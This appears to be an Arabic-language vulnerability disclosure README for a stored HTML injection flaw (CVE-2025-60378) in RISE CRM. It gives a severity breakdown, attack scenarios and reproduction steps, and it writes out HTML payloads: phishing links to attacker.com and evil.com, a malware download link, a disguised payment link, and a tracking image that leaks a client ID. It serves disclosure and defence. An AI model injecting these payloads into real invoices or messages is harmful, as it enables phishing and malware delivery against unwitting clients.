
إثبات مفهوم لثغرة حقن HTML مخزّنة في RISE CRM، يوضح كيف يمكن للمستخدمين المصادقين حقن HTML خبيث في الفواتير والرسائل، مما يؤدي إلى التصيد الاحتيالي وتوزيع البرمجيات الخبيثة عبر رسائل البريد الإلكتروني وملفات PDF الآلية.
⚠️ تنبيه أمني
ثغرة حرجة لحقن HTML المخزّن تؤثر على الفواتير والرسائل والاتصالات الآلية
تم اكتشاف ثغرة حرجة لحقن HTML المخزّن في RISE Ultimate Project Manager & CRM تسمح للمستخدمين المصادق عليهم بحقن HTML خبيث في بنود الفواتير وملاحظات العملاء ووحدات المراسلة. يستمر هذا المحتوى المحقون في قاعدة البيانات ويتم عرضه تلقائيًا في رسائل البريد الإلكتروني وملفات PDF والدردشات الموجهة للعملاء، مما يتيح هجمات تصيد واسعة النطاق، واختراق البريد الإلكتروني للأعمال، وتوزيع البرمجيات الخبيثة عبر البريد الإلكتروني/PDF.
| السمة | القيمة |
|---|---|
| معرف CVE | CVE-2025-60378 |
| النوع | حقن HTML مخزّن |
| CWE | CWE-79 |
| ناقل الهجوم | الشبكة/عن بُعد |
| المصادقة | مطلوبة (صلاحيات منخفضة) |
| تفاعل المستخدم | لا شيء |
| الخطورة | عالية |
| CVSS v3.1 | 8.1 - عالية |
| المكتشف | Ajansha Shankar |
يفشل RISE CRM في تعقيم وترميز محتوى HTML بشكل صحيح في عدة حقول قابلة للتحرير من قبل المستخدم بما في ذلك الفواتير والرسائل وملاحظات العملاء. عندما يقوم المستخدمون المصادق عليهم بحقن حمولات HTML في هذه الحقول، يتم تخزين المحتوى في قاعدة البيانات دون تصفية كافية. بعد ذلك، يتم عرض هذا HTML الخبيث تلقائيًا في رسائل البريد الإلكتروني وملفات PDF المرفقة ووحدات المراسلة/الدردشة دون ترميز مناسب. تعمل الفواتير المتكررة والمراسلة الآلية على تضخيم الهجوم من خلال توزيع المحتوى الخبيث على عدة مستلمين في وقت واحد.
| العامل | التأثير | الشرح |
|---|---|---|
| السرية | 🔴 عالية | يمكن جمع بيانات اعتماد العملاء والبيانات الحساسة عبر التصيد |
| السلامة | 🔴 عالية | المحتوى الخبيث يمكن أن يغير تصور الاتصالات والعلاقات التجارية |
| التوفر | 🟡 منخفض | تأثير مباشر محدود على توفر النظام |
يقوم مهاجم بصلاحيات مدير مشروع منخفضة بإنشاء فاتورة تحتوي على HTML خبيث:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
يتم إرسال الفاتورة إلى أكثر من 100 عميل عبر البريد الإلكتروني الآلي. يتلقى جميع العملاء ما يبدو كفاتورة مشروعة توجههم إلى موقع تصيد. يجمع المهاجم بيانات الاعتماد من عدة ضحايا في وقت واحد.
يقوم مهاجم بحقن HTML خبيث في رسالة عميل:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
يتلقى جميع أعضاء الفريق والعملاء الرسالة في دردشتهم، وينقرون على الروابط لتنزيل البرمجيات الخبيثة.
يقوم مهاجم بإعداد فاتورة متكررة مع حمولة توصيل برمجيات خبيثة. كل شهر، يتلقى العملاء تلقائيًا فواتير تحتوي على محتوى خبيث مضمّن، مما يوفر ناقل هجوم مستمر.
Navigate to: RISE CRM Dashboard → Invoices/Messages → Create New
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ يتم عرض HTML المحقون في رسائل البريد الإلكتروني وPDF والمراسلة دون ترميز ✅ الروابط قابلة للنقر وتعيد التوجيه إلى مواقع المهاجم ✅ يتم تحميل الصور من خوادم يتحكم فيها المهاجم ✅ يستمر المحتوى في جميع اتصالات العملاء المستقبلية ✅ يصل التوزيع المتكرر إلى عدة مستلمين تلقائيًا
| التاريخ | الحدث |
|---|---|
| TBD | اكتشاف الثغرة |
| TBD | إخطار البائع |
| TBD | تعيين CVE-2025-60378 |
| TBD | إصدار التصحيح (v3.9.4) |
| TBD | الكشف العام |
اكتشف بواسطة: Ajansha Shankar
المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
النتيجة: 8.1 (عالية)
التفصيل:
للاستفسارات أو معلومات إضافية:
⭐ إذا كان هذا البحث مفيدًا، يرجى التفكير في وضع نجمة على هذا المستودع!
🔔 ابقَ على اطلاع: تابع هذا المستودع للحصول على تحديثات حول هذا البحث الأمني والأبحاث المستقبلية.